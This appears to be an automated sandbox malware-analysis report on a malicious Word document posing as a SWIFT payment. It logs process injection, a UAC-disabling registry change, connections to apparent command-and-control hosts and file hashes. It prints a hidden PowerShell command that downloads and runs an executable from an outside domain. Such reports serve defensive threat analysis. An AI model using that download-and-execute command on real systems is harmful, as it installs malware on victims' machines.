Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1740 wrote to memory of 340 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 340 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 340 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 340 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 1368 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 340 wrote to memory of 1496 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 340 wrote to memory of 1496 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 340 wrote to memory of 1496 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 340 wrote to memory of 1496 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 340 wrote to memory of 1496 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 340 wrote to memory of 1496 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 340 wrote to memory of 1496 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 1368 wrote to memory of 1056 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 1368 wrote to memory of 1056 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 1368 wrote to memory of 1056 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 1368 wrote to memory of 1056 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 1368 wrote to memory of 1056 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 1368 wrote to memory of 1056 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 1368 wrote to memory of 1056 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\EXCEL.exe
PID 1496 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1496 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1496 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1496 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1496 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1496 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1496 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1496 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1496 wrote to memory of 856 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1496 wrote to memory of 856 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1496 wrote to memory of 856 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1496 wrote to memory of 856 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1496 wrote to memory of 856 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1496 wrote to memory of 856 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1496 wrote to memory of 856 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1496 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1496 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1496 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1496 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1496 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1496 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1496 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1056 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1056 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1056 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1056 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1056 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1056 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1056 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1056 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1056 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1056 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1496 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
PID 1496 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Roaming\EXCEL.exe C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\EXCEL.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payment_Swift 20210930.doc"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://avira.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://avira.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"

C:\Users\Admin\AppData\Roaming\EXCEL.exe

"C:\Users\Admin\AppData\Roaming\EXCEL.exe"

C:\Users\Admin\AppData\Roaming\EXCEL.exe

"C:\Users\Admin\AppData\Roaming\EXCEL.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitch.com

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitch.com

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Program Files (x86)\Internet Explorer\iexplore.exe

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Program Files (x86)\Internet Explorer\iexplore.exe

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Program Files (x86)\Internet Explorer\iexplore.exe

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Program Files (x86)\Internet Explorer\iexplore.exe

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

C:\Windows\SysWOW64\notepad.exe

notepad.exe

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

Country Destination Domain Proto
US 8.8.8.8:53 avira.ydns.eu udp
US 192.3.194.242:80 avira.ydns.eu tcp
US 192.3.194.242:80 avira.ydns.eu tcp
US 192.3.194.242:80 avira.ydns.eu tcp
US 8.8.8.8:53 kapasky-antivirus.firewall-gateway.net udp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
US 8.8.8.8:53 kapasky-antivirus.firewall-gateway.net udp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp
FR 91.121.250.249:4000 kapasky-antivirus.firewall-gateway.net tcp

Files

memory/1740-53-0x0000000072F51000-0x0000000072F54000-memory.dmp

memory/1740-54-0x00000000709D1000-0x00000000709D3000-memory.dmp

memory/1740-55-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1740-56-0x00000000765A1000-0x00000000765A3000-memory.dmp

memory/340-57-0x0000000000000000-mapping.dmp

memory/1368-58-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 d4f570ca4668b2659de4e50985d6b942
SHA1 edb1826cd89426c66954e34033ae2bac471874ae
SHA256 f78303dd088ae6ca135c220a6c4907ef103bdfb3afd4ecdc74204c467323ca85
SHA512 2b0ddc24c911b526f28a04ed6c79bf201681cab9e3016b0176bb0a54d6bff2863bc0436bfbcf92c372be7e46d44bc1e560de88bd9f48ba56ad45373ffb901b85

memory/1368-62-0x0000000002350000-0x0000000002F9A000-memory.dmp

memory/1368-63-0x0000000002350000-0x0000000002F9A000-memory.dmp

\Users\Admin\AppData\Roaming\EXCEL.exe

MD5 cb12b24b0f69225693168e9c35761a1b
SHA1 0f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256 c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA512 9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

memory/1496-65-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\EXCEL.exe

MD5 cb12b24b0f69225693168e9c35761a1b
SHA1 0f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256 c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA512 9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

C:\Users\Admin\AppData\Roaming\EXCEL.exe

MD5 cb12b24b0f69225693168e9c35761a1b
SHA1 0f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256 c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA512 9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

memory/1056-69-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Roaming\EXCEL.exe

MD5 cb12b24b0f69225693168e9c35761a1b
SHA1 0f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256 c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA512 9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

C:\Users\Admin\AppData\Roaming\EXCEL.exe

MD5 cb12b24b0f69225693168e9c35761a1b
SHA1 0f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256 c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA512 9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

memory/1496-71-0x0000000000D20000-0x0000000000D21000-memory.dmp

memory/1352-78-0x0000000000000000-mapping.dmp

memory/1492-77-0x0000000000000000-mapping.dmp

memory/1492-83-0x0000000002381000-0x0000000002382000-memory.dmp

memory/1492-82-0x0000000002380000-0x0000000002381000-memory.dmp

memory/1056-81-0x0000000004C10000-0x0000000004C11000-memory.dmp

memory/1492-84-0x0000000002382000-0x0000000002384000-memory.dmp

memory/1496-80-0x0000000004800000-0x0000000004801000-memory.dmp

memory/1752-85-0x0000000000000000-mapping.dmp

memory/1548-86-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 d4f570ca4668b2659de4e50985d6b942
SHA1 edb1826cd89426c66954e34033ae2bac471874ae
SHA256 f78303dd088ae6ca135c220a6c4907ef103bdfb3afd4ecdc74204c467323ca85
SHA512 2b0ddc24c911b526f28a04ed6c79bf201681cab9e3016b0176bb0a54d6bff2863bc0436bfbcf92c372be7e46d44bc1e560de88bd9f48ba56ad45373ffb901b85

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 d4f570ca4668b2659de4e50985d6b942
SHA1 edb1826cd89426c66954e34033ae2bac471874ae
SHA256 f78303dd088ae6ca135c220a6c4907ef103bdfb3afd4ecdc74204c467323ca85
SHA512 2b0ddc24c911b526f28a04ed6c79bf201681cab9e3016b0176bb0a54d6bff2863bc0436bfbcf92c372be7e46d44bc1e560de88bd9f48ba56ad45373ffb901b85

memory/1752-93-0x00000000021F1000-0x00000000021F2000-memory.dmp

memory/1752-92-0x00000000021F0000-0x00000000021F1000-memory.dmp

memory/1752-94-0x00000000021F2000-0x00000000021F4000-memory.dmp

memory/1496-95-0x0000000000C00000-0x0000000000C4F000-memory.dmp

memory/1496-96-0x0000000000840000-0x0000000000870000-memory.dmp

\Users\Admin\AppData\Local\Temp\EXCEL.exe

MD5 cb12b24b0f69225693168e9c35761a1b
SHA1 0f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256 c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA512 9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

MD5 cb12b24b0f69225693168e9c35761a1b
SHA1 0f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256 c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA512 9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

\Users\Admin\AppData\Local\Temp\EXCEL.exe

MD5 cb12b24b0f69225693168e9c35761a1b
SHA1 0f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256 c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA512 9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

MD5 cb12b24b0f69225693168e9c35761a1b
SHA1 0f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256 c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA512 9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

\Users\Admin\AppData\Local\Temp\EXCEL.exe

MD5 cb12b24b0f69225693168e9c35761a1b
SHA1 0f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256 c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA512 9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

\Users\Admin\AppData\Local\Temp\EXCEL.exe

MD5 cb12b24b0f69225693168e9c35761a1b
SHA1 0f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256 c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA512 9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

memory/1696-107-0x00000000004010B8-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

MD5 cb12b24b0f69225693168e9c35761a1b
SHA1 0f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256 c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA512 9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

memory/1328-110-0x00000000004010B8-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

MD5 cb12b24b0f69225693168e9c35761a1b
SHA1 0f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256 c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA512 9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

memory/1696-106-0x0000000000400000-0x000000000042C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe

MD5 cb12b24b0f69225693168e9c35761a1b
SHA1 0f68f676d76e3546d7d625cdb14f0947c59beff5
SHA256 c830683f700f311fe3d533d849cf045b1cbed5ff76debaa6c3dd8f71c0daa535
SHA512 9d53b958b83d8599d0eb1ee4766f03a735cd557290921ded296513e34fd2886ff78382e9a1616613c566d0be9cd5c381fa4de6b86a921d0a33aac1c499d00c65

memory/1684-116-0x0000000000400000-0x0000000000443000-memory.dmp

memory/1684-117-0x0000000000401364-mapping.dmp

memory/596-119-0x0000000000401364-mapping.dmp

memory/828-121-0x0000000000401364-mapping.dmp

memory/1836-123-0x0000000000401364-mapping.dmp

memory/1836-124-0x00000000004C0000-0x0000000000613000-memory.dmp

memory/1368-127-0x0000000000000000-mapping.dmp

memory/1148-130-0x0000000000000000-mapping.dmp

memory/1148-131-0x000007FEFC461000-0x000007FEFC463000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-30 16:22

Reported

2021-09-30 16:25

Platform

win10v20210408

Max time kernel

148s

Max time network

152s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payment_Swift 20210930.doc" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_104f C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key created \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_104f\Children C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key deleted \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-1076071834-4270782119-4084125449-2050494880-2007380509-1683145255-1556221127 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key created \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-1076071834-4270782119-4084125449-2050494880-2007380509-1683145255-1556221127 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
